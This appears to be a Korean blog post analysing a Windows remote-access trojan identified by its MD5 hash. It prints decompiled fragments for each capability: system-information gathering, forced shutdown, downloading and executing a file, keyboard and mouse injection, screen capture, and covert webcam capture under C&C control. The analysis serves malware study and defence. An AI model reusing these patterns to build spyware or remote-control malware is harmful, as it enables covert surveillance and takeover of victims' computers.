MD5 : deaf01d9625d4104dbdc00eba37d7fc0
사용자 시스템 정보 수집
GetComputerNameA(&Buffer, &nSize) GetVersionExA(&VersionInformation) GlobalMemoryStatus((LPMEMORYSTATUS)&v15)
종료 및 재부팅
case 0x1000001:
sub_300A70("SetShutdownPrivilege",1);
ExitWindowsEx(0xCu, 0);
break;
case 0x1000002:
sub_300A70("SetShutdownPrivilege",1);
ExitWindowsEx(0x6u, 0);
break;
case 0x1000003:
sub_300A70("SetShutdownPrivilege",1);
ExitWindowsEx(0x4u, 0);
break;
파일 다운로드 및 실행
wsprintfA(&v8, "abcdefg.exe");
GetTemppathA(0x104u, &CmdLine);
strcat(&CmdLine, "\\")
strcat(&CmdLine, &v8);
v1 = LoadLibraryA("urlmon.dll");
v2 = GetProcAddress(v1, "URLDownloadToFileA");
......
return WinExec(&CmdLine, 5u)
키보드/마우스 이벤트 API를 호출하여 제어
case 0x10000011:
sub_300120(&v32);
keybd_event(X[0], 0, 0, 0);
sub_300170(&v32);
break;
case 0x10000012:
sub_300120(&v28);
keybd_event(X[0], 0, 2u, 0);
sub_300170(&v28);
break;
case 0x10000013:
sub_300120(&v30);
SetCursorPos(*(int *)X, Y);
sub_300170(&v30);
break;
case 0x10000014:
sub_300120(&v24);
mouse_event(2u, 0, 0, 0, 0);
sub_300170(&v24);
break;
case 0x10000015:
sub_300120(&v27);
mouse_event(4u, 0, 0, 0, 0);
sub_300170(&v27);
break;
PC화면 스크린샷
CreateDC 함수 호출 후 전체 화면 DC 생성
CreateCompatibleDC 함수 호출 후 만들어진 전체 화면 DC를 호환되는 메모리 DC로 생성
CreateCompatibleBitmap 함수 호출 후 비트맵을 생성
BitBlt 함수를 호출 해서 메모리 DC에 화면 DC를 복사v1 = this;
v2 = CreateDCA("DISPLAY", 0, 0, 0);
v3 = v2;
v4 = CreateCompatibleDC(v2);
v5 = v4;
v6 = v4;
v7 = CreateCompatibleBitmap(v3, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6));
SelectObject(v5, v7);
BitBlt(v5, 0, 0, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6), v3, 0, 0, 0xCC0020u);
............
GetDIBits(v6, v7, 0, *((_DWORD *)v1 + 6), (LPVOID)(*((_DWORD *)v1 + 1) + *((_DWORD *)v1 + 4)), (LPBITMAPINFO)v10, 0);
DeleteDC(v6);
DeleteDC(v3);
return DeleteObject(v7);
캠 도청
capCreateCaptureWindow 함수 호출 후 캡쳐 윈도우를 생성
C&C 서버에서 capDrivaerConnec 함수 호출 후 캡쳐 드라이브와 캡쳐 윈도우를 연결
v2 = CreateWindowExA(0, "#11220", WindowName, 0x80000000u, 0, 0, 0, 0, 0, 0, 0, 0);
*(_DWORD *)(v1 + 12) = v2;
*(_DWORD *)(v1 + 16) = capCreateCaptureWindowa("CVideoCap", 1342177280, 0, 0, 0, 0, v2, 0);
'Analysis > Malware' 카테고리의 다른 글
Packed.Dropper.PE (0) | 2016.07.27 |
---|---|
[로컬 백도어] Image file execution option (0) | 2016.06.21 |
CryptXXX Decryptor (0) | 2016.06.21 |
Malware Classification (0) | 2016.06.21 |
Hosts 변조 (0) | 2016.06.20 |